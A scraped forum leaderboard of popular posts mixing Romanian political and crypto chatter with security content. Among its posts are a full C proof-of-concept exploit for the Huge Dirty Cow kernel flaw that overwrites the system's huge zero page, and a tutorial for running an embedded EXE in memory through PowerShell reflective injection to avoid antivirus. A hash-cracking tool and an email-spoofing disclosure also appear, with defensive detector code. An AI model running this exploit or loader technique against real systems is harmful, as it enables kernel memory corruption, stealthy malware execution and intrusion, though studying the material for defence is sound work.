
Leaderboard


Popular Content

Showing content with the highest reputation since 12/09/17 in all areas

  1. 18 points
    I made myself a blog too. I won't write very often, just now and then... https://nytrosecurity.com/
  2. 8 points
  3. 7 points
    Hi, I was looking today over the changes made by our "friends" from PSD-ALDE and I noticed something interesting. It concerns "Art. 223 Conditions and cases in which pre-trial detention may be ordered", paragraph 2. Original text: "Pre-trial detention of the defendant may also be ordered if the evidence gives rise to a reasonable suspicion that he has committed an intentional offence against life, an offence that caused bodily harm or the death of a person, an offence against national security provided for by the Criminal Code and other special laws, an offence of drug trafficking, of carrying out illegal operations with precursors or with other products likely to have psychoactive effects, an offence of violating the regime of weapons, ammunition, nuclear materials and explosives, trafficking and exploitation of vulnerable persons, acts of terrorism, money laundering, counterfeiting of currency, stamps or other securities, blackmail, rape, unlawful deprivation of liberty, tax evasion, contempt, judicial contempt, a corruption offence, an offence committed through computer systems or electronic communication means, or another offence for which the law provides a prison sentence of 5 years or more and, based on an assessment of the seriousness of the act, of the manner and circumstances of its commission, of the entourage and environment he comes from, of his criminal record and of other circumstances regarding his person, it is found that depriving him of liberty is necessary to remove a state of danger to public order."
    Modified text: "Pre-trial detention of the defendant may also be ordered if the evidence gives rise to a reasonable suspicion that he has committed an intentional offence against life, an offence that caused bodily harm or the death of a person, an offence against national security provided for by the Criminal Code and other special laws, an offence of narcotics trafficking, arms trafficking, human trafficking, terrorism or one aimed at acts of terrorism, counterfeiting of currency or other securities, blackmail, rape, deprivation of liberty, contempt, judicial contempt or another offence committed with violence and, cumulatively, based on an assessment of the seriousness of the act, of the manner and circumstances of its commission, of the entourage and environment he comes from, of his criminal record and of other circumstances regarding his person, it is found that depriving him of liberty is absolutely necessary to remove a state of concrete danger to public order." Here is a DIFF: As I expected, you can see that the following are missing: - money laundering - tax evasion - corruption offences. But also "offence committed through computer systems or electronic communication means". In other words, in my opinion as someone who is not an expert in the legal field, pre-trial detention will no longer apply to those offences. I posted this because, in case you are accused of "offences committed through computer systems", you should keep in mind that (if the law passes, and it probably will) you cannot be detained. You can find here a collection of PSD-branded changes: http://media.hotnews.ro/media_server1/document-2017-12-14-22176865-0-transpunere-directiva-nevinovatie-13-dec.pdf
  4. 7 points
    There's no point because you're a bot! That garbage (teenspaidcash) is a scam. If you make a donation of at least 10 EUR here and post proof, I'll explain in detail why it's a scam.
  5. 5 points
    And if people have no reason to thank you, will you offer some woman from your life to others for alternative satisfaction? Because statements like this are either made by someone credible (with a track record of successful crypto investments), are insider trading, or come with some logical arguments. Otherwise they are irrelevant, even if wabi has an interesting background and potential.
  6. 4 points
    The Ripple partnerships with banks don't really work the way people think, from what I've researched. Ripple as a company offers the technology behind their blockchain to banks so they can do settlement faster and more securely. That doesn't mean banks go and buy the public XRP token and use it. In my opinion this XRP rise is just hype, as it has been in the past, pump and dump. I may be wrong because I haven't done much research on this, but I'd say be careful with XRP.
  7. 4 points
    Life of a software developer
  8. 4 points
    What is InfoCon? InfoCon is a community supported, non-commercial archive of all the past hacking related convention material that can be found. https://infocon.org/
  9. 4 points
    https://www.ripstech.com/php-security-calendar-2017/
  10. 3 points
    Hi, I thought this might help someone. If you make an account at the link https://my.visualstudio.com/benefits you get some benefits; I'll list some of them in case anyone is interested. 1. Professional Development: Data Camp - 2 months free subscription; Pluralsight - 3 months free subscription; Linux Academy - 2 months free; and many others. 2. Tools and features: Azure - free account + $200 credit; Visual Studio Community edition and many other interesting tools. Happy learning!
  11. 3 points
    Who the hell watches kids making noise? Skill-wise it's rubbish and not nice to watch like a professional match. (git gud kid) As entertainment it's even worse. 5 kids making noise into a 3-lei microphone from the market. You're not funny, there's no audio quality and no quality in gameplay skill. If you want to be a youtuber, go for another segment or try to do much more original things.
  12. 3 points
    Story Save and access docs and photos and music on your own local Pi Cloud server! The best part: you can use it if, or when, the Internet goes down (or if you're in a remote spot & want access to Wikipedia). Oh hey, and if your friend gets one and they live close (*ahem*80ft*ahem*), you can share stuff with them and make your own personal chat line! If enough folks built Pi Cloud servers, we could crowdsource the Internet! That would be an 11/10 on a scale of greatness. With the new models of the Raspberry Pi computer, it's possible and not even expensive! (What! Tell me more!) This tutorial will show you how to set up a short-range (~ 80 ft) WiFi Access Point and a personal web server ('bringin it back to HTML bbies). You can set this up as a (closed) local network only (i.e. your own personal "cloud" backup device), or broadcast it to the rest of the world! (..if you do this be sure you know network security.) That said, assuming you have a basic knowledge of the Pi, here's the breakdown: Read Time: ~ 40 min Build Time: ~ 60 min (less if you are experienced w/ Linux) Cost: ~ $35 (for the Pi 3) Link: https://www.hackster.io/jenfoxb0t/make-your-pi-a-local-cloud-server-c4f3f1
  13. 3 points
    Does it count even without a university degree?
  14. 3 points
    With my eyes closed I would have bet all my coins, the problem is I don't have any, on the fact that you'd turn it into "I'm rich, you're poor". I'm telling you that Palm Beach does market manipulation with people like you and you say exactly the opposite. Using the first person singular in almost every sentence. 10% of an average of $100k per head, if that picture is even yours because maybe you copied that too, times 1000 clients makes +50 BTC? You say "I don't just do MM" but "you need +50 BTC", which you don't have. WTF?! You call subscribing to an email insider trading information? Except that "major player" invested light-years before and is using you to raise the price. Damn, maybe you even buy from him. Understand, dummy, you're not doing manipulation, you're just a tool bragging that he made 100k too. Let me see you multiply it on real businesses, not alidropshipping and hype trading. Where else do you subscribe and what courses do you buy for these? Not for nothing, but @Che wants to open a dental practice and doesn't know how to start. Are the SHITCOIN courses free or do I have to pay? How to make $10000 in a week trading crypto, price $99.99. I did a copy/paste from wiki with economic explanations in another topic. I recommend you read it to understand more precisely why SHITCOIN rose and maybe you'll realise how a "major player" controls the price through supply. You and the rest of the Palm Beach pack being the demand. P.S. Where did I bring up or suggest that market manipulation is illegal on crypto? What crap are you reading between the lines? Still, I recommend you don't hold too much ripple, lest you get surprises from NYC about market manipulation.
  15. 2 points
    Stack Based Buffer Overflows on x86 (Windows) – Part I. I wrote this article in Romanian, in 2014, and I decided to translate it, because it is a very detailed introduction to the exploitation of a "Stack Based Buffer Overflow" on x86 (32 bits) Windows. Introduction: This tutorial is for beginners, but it requires at least some basic knowledge about C/C++ programming in order to understand the concepts. The system that we will use and exploit the vulnerability on is Windows XP (32 bits – x86) for simplicity reasons: there is no DEP and ASLR, things that will be detailed later. I would like to start with a short introduction to assembly (ASM) language. It will not be very detailed, but I will shortly describe the concepts required to understand what a "buffer overflow" vulnerability looks like, and how it can be exploited. There are multiple types of buffer overflows; here we will discuss only the easiest one to understand, the stack based buffer overflow. Source: https://nytrosecurity.com/2017/12/09/stack-based-buffer-overflows-on-x86-windows-part-i/
  16. 2 points
    The Federal Communications Commission (FCC), the American regulator of the sector, ruled on Thursday to end the principle of "net neutrality", which obliges internet access providers to treat all online content in the same manner, AFP writes. The FCC decision, which judged that the current regulation was an obstacle to investment, theoretically authorises internet providers to modulate traffic speed according to content, which could lead to the creation of a "two-speed internet". Supporters of "neutrality" fear that internet providers will be tempted to ask for more money for higher speeds. The FCC "hands the keys to the internet" to a "handful of multi-billion-dollar companies", accused Mignon Clyburn, an FCC member who voted against the decision. The very heated debate over "net neutrality" has been going on for about ten years in the US. About a hundred people demonstrated on Thursday morning in front of the FCC headquarters, where they set up a mini-mausoleum in memory of the internet "as we have always known it". More info: http://thehill.com/policy/technology/364887-fcc-votes-to-repeal-net-neutrality-rules
  17. 2 points
    RetDec
    RetDec is a retargetable machine-code decompiler based on LLVM. The decompiler is not limited to any particular target architecture, operating system, or executable file format:
    Supported file formats: ELF, PE, Mach-O, COFF, AR (archive), Intel HEX, and raw machine code.
    Supported architectures (32b only): Intel x86, ARM, MIPS, PIC32, and PowerPC.
    Features:
    - Static analysis of executable files with detailed information.
    - Compiler and packer detection.
    - Loading and instruction decoding.
    - Signature-based removal of statically linked library code.
    - Extraction and utilization of debugging information (DWARF, PDB).
    - Reconstruction of instruction idioms.
    - Detection and reconstruction of C++ class hierarchies (RTTI, vtables).
    - Demangling of symbols from C++ binaries (GCC, MSVC, Borland).
    - Reconstruction of functions, types, and high-level constructs.
    - Integrated disassembler.
    - Output in two high-level languages: C and a Python-like language.
    - Generation of call graphs, control-flow graphs, and various statistics.
    https://github.com/avast-tl/retdec
  18. 2 points
    Finally! We've been waiting for this for a long time. I knew I didn't vote for them for nothing.
  19. 2 points
  20. 2 points
    as expected there was heavy panic selling, going down to about 12 thousand :))))) whoever held their position is reaping the rewards now (including those who bought again at 12 thousand). I'll post the analysis once more, good for whoever knew how to profit from it: http://www.newsbtc.com/2017/12/10/bitcoin-price-weekly-analysis-btc-usd-correction-underway/
  21. 2 points
    http://web.archive.org/web/20101224064236/http://codingthewheel.com/archives/how-to-inject-a-managed-assembly-dll
  22. 2 points
    You know you're poor when you only have enough money for @Okjokes's mum
  23. 2 points
    I was just thinking you should get back to knowledge sharing. If you want a suggestion: change the domain name. You may want to start a company in the future, and the name is too close to Nitro Security (http://www.nitrosecurity.ro/ - a security guard company), and it would be a pity not to be able to make full use of the image capital you'll build up with the blog. Happy writing!
  24. 2 points
    @human.b.t.a https://github.com/dosomder/iovyroot/issues/16 good luck!
  25. 2 points
    I laughed my ass off.
  26. 2 points
  27. 1 point
    Bump. Waiting for new projects. My schedule is free at the moment.
  28. 1 point
    @Zatarra, what do you prefer: an iMac or a studio apartment?
  29. 1 point
    In case they rigged the elections "through computer systems or electronic communication means". A safety net anyway; it's a long road to a pre-trial detention order. They have enough methods and people they can use. You don't get to a high position if you're clean; they hold information to blackmail you with. A few years ago they were still arguing over which institutions get to tap phones and which don't. Ordinary rags. Edit: It's not worth stressing over. Edit2: Too many coincidences. As soon as they introduced the voter-turnout monitoring system, PSD came out number one, both in the local and in the parliamentary elections. Damn, I can't find who won the tender for the software.
  30. 1 point
  31. 1 point
    "it came back again"?!?! the question is when was it started? what the hell is that garbage?
  32. This post cannot be displayed because it is in a forum which requires at least 10 posts to view.
  33. 1 point
    The information received from you, the termination request and the sum of 250 euros (registration fee).
  34. This post cannot be displayed because it is in a forum which requires at least 10 posts to view.
  35. 1 point
    https://www.bloomberg.com/news/articles/2017-12-08/the-bitcoin-whales-1-000-people-who-own-40-percent-of-the-market
  36. 1 point
    I managed to get rid of them 😀😀😀. Thank you very much for all the help!
  37. 1 point
    Hi, I made a program that posts by itself in Facebook Groups. There are 3 files: 1. grupuri.txt - here you put the links to the groups 2. text.txt - here goes the text to be posted 3. config.txt - for now this is where you can set the number of seconds to wait between posts. I'm waiting for opinions and for suggestions on what improvements to add. It's not finished yet; I'll post a download link when it's ready. And I think I'll leave it on the console for now, without a GUI.
  38. 1 point
    https://coin.fyi/portfolio/main-cdc03655512ec1e6 https://coin.fyi/portfolio/main-7bbefbc5e3e1fc66 https://coin.fyi/portfolio/main-5fda1c169094cfbf
  39. 1 point
    the biggest bullshit you can do is post a full match. 1. I don't care what you do during the game 2. if it's a video with pro/funny moments from the game, and it's max 5-6 min, I'll try to watch it. 3. if you have no sense of humour but force it just to have something to put in the video, I close it from the start. 4. if you're silver-nova and film yourself killing 3-4-5, please, check your rank again; only from MG1 onwards can you say you have a clue what it's about. p.s. after I saw your video. what can I say, you have shitty jokes, a shitty voice, a shitty accent and there was one voice whose sex I really couldn't tell. do you think that if you say things that make no sense or that just come to mind on the spot we'll be amused? I also have a friend who is "struggling" to get into this line. he forced the jokes and the amusement just to have something to put up; it's not like he's funny in a natural way. Codin from Creative Monkeyz is funny in a natural way, he has creativity and developed emotional intelligence; you don't, and you force yourselves to push jokes out of your mouths, but you only push out shit, that's all. read some books, develop yourselves and then try to do something.
  40. 1 point
    Source: https://www.google.ro/amp/s/truesecdev.wordpress.com/2016/03/15/embedding-exe-files-into-powershell-scripts/amp/
    Fabio Viggiani, 2 years ago
    As sometimes happens, when you solve a particular problem, you realize that the solution can be generalized to cover more scenarios than the one you had in mind. This is one of those stories.
    I was trying to resolve an issue with creating a pure PowerShell payload as part of a client-side attack. Using PowerShell to run malicious code has many advantages, including:
    - No need to install anything on the target.
    - Very powerful engine underneath (e.g. you can directly invoke .NET code).
    - You can use base64-encoded commands to obfuscate your evil commands, making the attack a little less obvious to spot. This is also a way to avoid escaping all the special characters, especially in advanced attacks involving several steps to deliver the payload.
    - You can use Invoke-Expression to interpret strings as PowerShell commands. From a penetration tester's perspective, this is very useful to avoid writing complex scripts on disk. For example, you can use PowerShell to download an additional (complex) script, and pipe it directly to Invoke-Expression, which will interpret and execute the downloaded script in memory, within the PowerShell process. This also avoids antivirus detection.
    The payload I wanted to run on the target included fairly complex functionality. I had that functionality as part of an EXE file. I didn't want to drop the binary on the target system since it could potentially trigger an antivirus. I wanted to use PowerShell, but I didn't want to rewrite the whole thing in PowerShell. So I came up with a solution.
    The objective is to embed a binary into a PowerShell script, and run it from within the script without writing it on disk. This is how the solution works:
    1. Take your binary file and base64-encode it. You can use the following function:
        function Convert-BinaryToString {
            [CmdletBinding()]
            param (
                [string] $FilePath
            )
            try {
                $ByteArray = [System.IO.File]::ReadAllBytes($FilePath);
            }
            catch {
                throw "Failed to read file. Ensure that you have permission to the file, and that the file path is correct.";
            }
            if ($ByteArray) {
                $Base64String = [System.Convert]::ToBase64String($ByteArray);
            }
            else {
                throw '$ByteArray is $null.';
            }
            Write-Output -InputObject $Base64String;
        }
    2. Create a new script with the following:
    - The EXE converted to a string as created in point 1
    - The function Invoke-ReflectivePEInjection (part of the PowerSploit project)
    - Convert the string to a byte array
    - Call Invoke-ReflectivePEInjection
    So basically your binary is just a string in the PowerShell script. Once decoded as a byte array, the function Invoke-ReflectivePEInjection (part of the PowerSploit project) will run it in memory within the PowerShell process. The final payload will look something like this:
        # Your base64 encoded binary
        $InputString = '...........'

        function Invoke-ReflectivePEInjection {
            ......
            ......
            ......
        }

        # Convert base64 string to byte array
        $PEBytes = [System.Convert]::FromBase64String($InputString)

        # Run EXE in memory
        Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "Arg1 Arg2 Arg3 Arg4"
    You can now run the script on the target like this:
        powershell -ExecutionPolicy Bypass -File payload.ps1
    Depending on the binary you embedded, you might get the following error:
        PE platform doesn't match the architecture of the process it is being loaded in (32/64bit)
    To fix the issue, simply run the 32 bit PowerShell:
        %windir%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File payload.ps1
    In the example below, I embedded plink.exe in payload.ps1
    Pretty cool, uh?
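    The defender's side of the technique described in that post, as an added example that is not part of the original article or of the PowerSploit project: a small Python scanner that looks for what such a payload.ps1 leaves behind in the script text, namely a long quoted base64 literal that decodes to a PE image (an "MZ" DOS header whose e_lfanew points at a "PE\0\0" signature) next to FromBase64String and Invoke-ReflectivePEInjection. The sample script, the fake PE bytes, the 64-character threshold and the indicator names are all constructed for the demo and are my own choices.

```python
import base64
import binascii
import re

# Quoted base64 literals long enough to plausibly carry a binary (threshold is my choice).
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{64,}={0,2})['\"]")

# Loader indicators taken from the technique described in the article.
LOADER_PATTERNS = {
    "reflective_loader": re.compile(r"Invoke-ReflectivePEInjection", re.IGNORECASE),
    "base64_decode": re.compile(r"\[System\.Convert\]::FromBase64String", re.IGNORECASE),
    "pebytes_arg": re.compile(r"-PEBytes\b", re.IGNORECASE),
}


def looks_like_pe(raw: bytes) -> bool:
    """True if the bytes carry a DOS header whose e_lfanew points at a 'PE\\0\\0' signature."""
    if len(raw) < 0x40 or raw[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(raw[0x3C:0x40], "little")
    return raw[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def find_embedded_pe(script_text: str) -> list:
    """Return one record per quoted base64 literal that decodes to a PE image."""
    hits = []
    for match in B64_LITERAL.finditer(script_text):
        blob = match.group(1)
        try:
            raw = base64.b64decode(blob, validate=True)
        except binascii.Error:
            continue  # not valid base64 after all (bad padding etc.)
        if looks_like_pe(raw):
            hits.append({"offset": match.start(1), "size": len(raw)})
    return hits


def score_script(script_text: str) -> dict:
    """Combine the two signals: an embedded PE plus reflective loader code is the pattern to alert on."""
    indicators = sorted(name for name, pat in LOADER_PATTERNS.items() if pat.search(script_text))
    embedded = find_embedded_pe(script_text)
    return {
        "embedded_pe": len(embedded),
        "indicators": indicators,
        "suspicious": bool(embedded) and "reflective_loader" in indicators,
    }


# --- constructed sample data (not a real executable, not a real payload) ---
_dos_header = bytearray(128)
_dos_header[0:2] = b"MZ"
_dos_header[0x3C:0x40] = (128).to_bytes(4, "little")  # e_lfanew -> right after the DOS header
FAKE_PE = bytes(_dos_header) + b"PE\x00\x00" + b"\x00" * 400

# Mirrors the payload layout described in the post; the function body is a stub, the blob is FAKE_PE.
SAMPLE_SCRIPT = f"""
$InputString = '{base64.b64encode(FAKE_PE).decode("ascii")}'
function Invoke-ReflectivePEInjection {{ param($PEBytes, $ExeArgs) }}
$PEBytes = [System.Convert]::FromBase64String($InputString)
Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "Arg1 Arg2"
"""

# A script that decodes base64 for a legitimate reason: must not be flagged.
BENIGN_SCRIPT = """
$greeting = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SGVsbG8gd29ybGQ='))
Write-Output $greeting
"""

if __name__ == "__main__":
    for name, text in (("sample", SAMPLE_SCRIPT), ("benign", BENIGN_SCRIPT)):
        print(name, score_script(text))
```

    Running it prints a record for each script; only the sample with both an embedded PE and the reflective loader comes out as suspicious, while the benign decoder that merely calls FromBase64String does not. Base64 alone is a weak signal, which is why the two are combined.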
  41. This post cannot be displayed because it is in a forum which requires at least 10 posts to view.
  42. 1 point
    I got out of ripple, maximum luck (I got greedy and nearly blew it); I'll place 2 more orders this year and then sit tight, good luck
  43. 1 point
    Dagon - Advanced Hash Manipulation
    Named after the prince of Hell, Dagon (day-gone) is an advanced hash cracking and manipulation system, capable of bruteforcing multiple hash types, creating bruteforce dictionaries, automatic hashing algorithm verification, random salt generation from Unicode to ASCII, and much more.
    Note: Dagon comes complete with a Hash Guarantee: I personally guarantee that Dagon will be able to crack your hash successfully. At any point Dagon fails to do so, you will be given a choice to automatically create a Github issue with your hash. Once this issue is created, I will try my best to crack your hash for you. The Github issue is completely anonymous, and no questions will be asked. This is my way of thanking you for using Dagon. There are alternatives to using the automatic issue creator. If you do not want your hash publicly displayed, and feel Dagon has failed you, feel free to create your own issue. Or send an email with the hash information to dagonhashguarantee@gmail.com
    Screenshots
    Bruteforcing made easy with a built in wordlist creator if you do not specify one. The wordlist will create 100,000 strings to use.
    Verify what algorithm was used to create that hash you're trying to crack. You can specify to view all possible algorithms by providing the -L flag (some algorithms are not implemented yet).
    Random salting, unicode random salting, or you can make your own choice on the salt.
    Demo video
    Download
    Preferably you can clone the repository with
        git clone https://github.com/ekultek/dagon.git
    alternatively you can download the zip or tarball here
    Basic usage
    For full functionality of Dagon please reference the homepage here or the user manual
        python dagon.py -h
    This will run the help menu and provide a list of all possible flags
        python dagon.py -c <HASH> --bruteforce
    This will attempt to bruteforce a given hash
        python dagon.py -l <FILE-PATH> --bruteforce
    This will attempt to bruteforce a given file full of hashes (one per line)
        python dagon.py -v <HASH>
    This will try to verify the algorithm used to create the hash
        python dagon.py -V <FILE-PATH>
    This will attempt to verify each hash in a file, one per line
    Installation
    Dagon requires python version 2.7.x to run successfully.
        git clone https://github.com/ekultek/dagon.git
        cd Dagon
        pip install -r requirements.txt
    This should install all the dependencies that you will need to run Dagon
    Contributions
    All contributions are greatly appreciated and helpful. When you contribute you will get your name placed on the homepage underneath contributions with a link to your contribution. You will also get massive respect from me, and that's a pretty cool thing. What I'm looking for in contributions is some of the following:
    - Hashing algorithm creations, specifically: a quicker MD2 algorithm, full Tiger algorithms, Keychain algorithms for cloud and agile
    - More wordlists to download from, please make sure that the link is encoded
    - Rainbow table attack implementation
    - More regular expressions to verify different hash types
    Source: https://github.com/Ekultek/dagon
  44. 1 point
    If you receive an email that looks like it's from one of your friends, just beware! It's possible that the email has been sent by someone else in an attempt to compromise your system. A security researcher has discovered a collection of vulnerabilities in more than 30 popular email client applications that could allow anyone to send spoofed emails bypassing anti-spoofing mechanisms. Discovered by security researcher Sabri Haddouche, the set of vulnerabilities, dubbed MailSploit, affects Apple Mail (macOS, iOS, and watchOS), Mozilla Thunderbird, several Microsoft email clients, Yahoo Mail, ProtonMail, and others. Although most of these affected email client applications have implemented anti-spoofing mechanisms, such as DKIM and DMARC, MailSploit takes advantage of the way email clients and web interfaces parse the "From" header. Email spoofing is an old-school technique, but it works well, allowing someone to modify email headers and send an email with a forged sender address to trick recipients into believing they are receiving that email from a specific person. On a dedicated website that went up today, Haddouche explained how the lack of input sanitization in vulnerable email clients could lead to an email spoofing attack without actually exploiting any flaw in DMARC. To demonstrate this attack, Haddouche created a payload by encoding non-ASCII characters inside the email headers, successfully sending a spoofed email from an official address belonging to the President of the United States. "Using a combination of control characters such as new lines or null-byte, it can result in hiding or removing the domain part of the original email," Haddouche says in his blog post. "We've seen a lot of malware spreading via emails, relying on social engineering techniques to convince users to open unsafe attachments, or click on phishing links. The rise of ransomware distributed over email clearly demonstrates the effectivity of those mechanisms."
Besides spoofing, the researcher found some of the email clients, including Hushmail, Open Mailbox, Spark, and Airmail, are also vulnerable to cross-site scripting (XSS) vulnerabilities, which stems from the email spoofing issue. Haddouche reported this spoofing bug to 33 different client applications, 8 of which have already patched this issue in their products before the public disclosure and 12 are on their way to fix it. Here you can find the list of all email and web clients (both patched and unpatched) that are vulnerable to MailSploit attack. However, Mozilla and Opera consider this bug to be a server-side issue and will not be releasing any patch. Mailbird closed the ticket without responding to the issue, while remaining 12 vendors did not yet comment on the researcher's report. Via thehackernews.com
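    The parsing bug the article describes, as an added example that is not part of the article or of the researcher's payloads: a minimal RFC 2047 encoded-word decoder, a "naive" renderer that hands the decoded text to code which stops at the first NUL or line break (so the real domain after it vanishes), and the hardened check that refuses any From header whose decoded form contains control characters. The addresses president@example.gov and attacker.example, the sample headers and the function names are constructed for the demo.

```python
import base64
import re

# One RFC 2047 encoded-word: =?charset?Q-or-B?text?=
ENCODED_WORD = re.compile(r"=\?([^?]+)\?([bBqQ])\?([^?]*)\?=")
# Anything a rendered header must never contain.
CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


def _decode_q(text: str) -> bytes:
    """RFC 2047 'Q' encoding: '_' stands for a space, '=XX' for a raw byte."""
    out = bytearray()
    i = 0
    while i < len(text):
        if text[i] == "=" and i + 3 <= len(text):
            out.append(int(text[i + 1:i + 3], 16))
            i += 3
        elif text[i] == "_":
            out.append(0x20)
            i += 1
        else:
            out += text[i].encode("ascii")
            i += 1
    return bytes(out)


def decode_encoded_words(header: str) -> str:
    """Expand every encoded-word, leaving unencoded text untouched.
    No sanitisation on purpose: this is the naive behaviour being demonstrated."""
    def expand(match):
        charset, enc, text = match.group(1), match.group(2).lower(), match.group(3)
        if enc == "q":
            raw = _decode_q(text)
        else:
            raw = base64.b64decode(text + "=" * (-len(text) % 4))
        return raw.decode(charset, errors="replace")
    return ENCODED_WORD.sub(expand, header)


def naive_display(header: str) -> str:
    """Sender as shown by a client that decodes, then hands the string to code that
    stops at the first NUL or line break: the real domain after it disappears."""
    decoded = decode_encoded_words(header)
    for terminator in ("\x00", "\r", "\n"):
        decoded = decoded.split(terminator, 1)[0]
    return decoded.strip()


def is_safe_from_header(header: str) -> bool:
    """The fix: a From header whose decoded form contains control characters is rejected."""
    return CONTROL_CHARS.search(decode_encoded_words(header)) is None


def hardened_display(header: str) -> str:
    if not is_safe_from_header(header):
        raise ValueError("control character in decoded From header; refusing to render")
    return decode_encoded_words(header)


def real_domain(header: str) -> str:
    """Domain of the address as actually transmitted (what DMARC alignment sees):
    the part after the last '@' of the raw, undecoded header."""
    return header.rsplit("@", 1)[1].strip("> ")


# --- constructed samples (hypothetical addresses, not the researcher's payloads) ---
# The encoded local part decodes to "president@example.gov" followed by a NUL byte.
SPOOFED_FROM_Q = "=?utf-8?Q?president=40example=2Egov=00?=@attacker.example"
# Same trick with B (base64) encoding.
SPOOFED_FROM_B = "=?utf-8?B?" + base64.b64encode(b"president@example.gov\x00").decode("ascii") + "?=@attacker.example"
# An ordinary internationalised display name, which the hardened check must still accept.
LEGIT_FROM = "=?utf-8?Q?Alice_Smith?= <alice@example.org>"

if __name__ == "__main__":
    for hdr in (SPOOFED_FROM_Q, SPOOFED_FROM_B, LEGIT_FROM):
        print(repr(naive_display(hdr)), real_domain(hdr), is_safe_from_header(hdr))
```

    The point the two spoofed headers make is that DMARC is not bypassed at all: the message really does come from attacker.example, and only the client's rendering of the decoded local part hides that. The check therefore belongs in the client, after decoding, and it must not break legitimate encoded display names such as the last sample.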
  45. 1 point
    "Huge Dirty Cow" POC
    A POC for the Huge Dirty Cow vulnerability (CVE-2017-1000405). Full details can be found here. Before running, make sure to set transparent huge pages to "always":
        echo always | sudo tee /sys/kernel/mm/transparent_hugepage/enabled
    Download HugeDirtyCowPOC-master.zip mirror:
        //
        // The Huge Dirty Cow POC. This program overwrites the system's huge zero page.
        // Compile with "gcc -pthread main.c"
        //
        // November 2017
        // Bindecy
        //

        #define _GNU_SOURCE
        #include <stdio.h>
        #include <stdlib.h>
        #include <fcntl.h>
        #include <unistd.h>
        #include <sched.h>
        #include <string.h>
        #include <pthread.h>
        #include <sys/mman.h>
        #include <sys/types.h>
        #include <sys/wait.h>

        #define MAP_BASE ((void *)0x4000000)
        #define MAP_SIZE (0x200000)
        #define MEMESET_VAL (0x41)
        #define PAGE_SIZE (0x1000)
        #define TRIES_PER_PAGE (20000000)

        struct thread_args {
            char *thp_map;
            char *thp_chk_map;
            off_t off;
            char *buf_to_write;
            int stop;
            int mem_fd1;
            int mem_fd2;
        };

        typedef void * (*pthread_proc)(void *);

        void *unmap_and_read_thread(struct thread_args *args)
        {
            char c;
            int i;

            for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) {
                madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Discard the temporary COW page.
                memcpy(&c, args->thp_map + args->off, sizeof(c));
                read(args->mem_fd2, &c, sizeof(c));
                lseek(args->mem_fd2, (off_t)(args->thp_map + args->off), SEEK_SET);
                usleep(10); // We placed the zero page and marked its PMD as dirty.
                            // Give get_user_pages() another chance before madvise()-ing again.
            }

            return NULL;
        }

        void *write_thread(struct thread_args *args)
        {
            int i;

            for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) {
                lseek(args->mem_fd1, (off_t)(args->thp_map + args->off), SEEK_SET);
                madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Force follow_page_mask() to fail.
                write(args->mem_fd1, args->buf_to_write, PAGE_SIZE);
            }

            return NULL;
        }

        void *wait_for_success(struct thread_args *args)
        {
            while (args->thp_chk_map[args->off] != MEMESET_VAL) {
                madvise(args->thp_chk_map, MAP_SIZE, MADV_DONTNEED);
                sched_yield();
            }

            args->stop = 1;
            return NULL;
        }

        int main()
        {
            struct thread_args args;
            void *thp_chk_map_addr;
            int ret = 0; // initialised so the early error paths below report cleanly

            // Mapping base should be a multiple of the THP size, so we can work with the whole huge page.
            args.thp_map = mmap(MAP_BASE, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
            if (args.thp_map == MAP_FAILED) {
                perror("[!] mmap()");
                return -1;
            }

            if (args.thp_map != MAP_BASE) {
                fprintf(stderr, "[!] Didn't get desired base address for the vulnerable mapping.\n");
                goto err_unmap1;
            }

            printf("[*] The beginning of the zero huge page: %lx\n", *(unsigned long *)args.thp_map);

            thp_chk_map_addr = (char *)MAP_BASE + (MAP_SIZE * 2); // MAP_SIZE * 2 to avoid merge
            args.thp_chk_map = mmap(thp_chk_map_addr, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
            if (args.thp_chk_map == MAP_FAILED) {
                perror("[!] mmap()");
                goto err_unmap1;
            }

            if (args.thp_chk_map != thp_chk_map_addr) {
                fprintf(stderr, "[!] Didn't get desired base address for the check mapping.\n");
                goto err_unmap2;
            }

            ret = madvise(args.thp_map, MAP_SIZE, MADV_HUGEPAGE);
            ret |= madvise(args.thp_chk_map, MAP_SIZE, MADV_HUGEPAGE);
            if (ret) {
                perror("[!] madvise()");
                goto err_unmap2;
            }

            args.buf_to_write = malloc(PAGE_SIZE);
            if (!args.buf_to_write) {
                perror("[!] malloc()");
                goto err_unmap2;
            }

            memset(args.buf_to_write, MEMESET_VAL, PAGE_SIZE);

            args.mem_fd1 = open("/proc/self/mem", O_RDWR);
            if (args.mem_fd1 < 0) {
                perror("[!] open()");
                goto err_free;
            }

            args.mem_fd2 = open("/proc/self/mem", O_RDWR);
            if (args.mem_fd2 < 0) {
                perror("[!] open()");
                goto err_close1;
            }

            printf("[*] Racing. Gonna take a while...\n");

            args.off = 0;

            // Overwrite every single page
            while (args.off < MAP_SIZE) {
                pthread_t threads[3];
                args.stop = 0;

                ret = pthread_create(&threads[0], NULL, (pthread_proc)wait_for_success, &args);
                ret |= pthread_create(&threads[1], NULL, (pthread_proc)unmap_and_read_thread, &args);
                ret |= pthread_create(&threads[2], NULL, (pthread_proc)write_thread, &args);
                if (ret) {
                    perror("[!] pthread_create()");
                    goto err_close2;
                }

                pthread_join(threads[0], NULL); // This call will return only after the overwriting is done
                pthread_join(threads[1], NULL);
                pthread_join(threads[2], NULL);

                args.off += PAGE_SIZE;
                printf("[*] Done 0x%lx bytes\n", args.off);
            }

            printf("[*] Success!\n");

        err_close2:
            close(args.mem_fd2);
        err_close1:
            close(args.mem_fd1);
        err_free:
            free(args.buf_to_write);
        err_unmap2:
            munmap(args.thp_chk_map, MAP_SIZE);
        err_unmap1:
            munmap(args.thp_map, MAP_SIZE);

            if (ret) {
                fprintf(stderr, "[!] Exploit failed.\n");
            }

            return ret;
        }
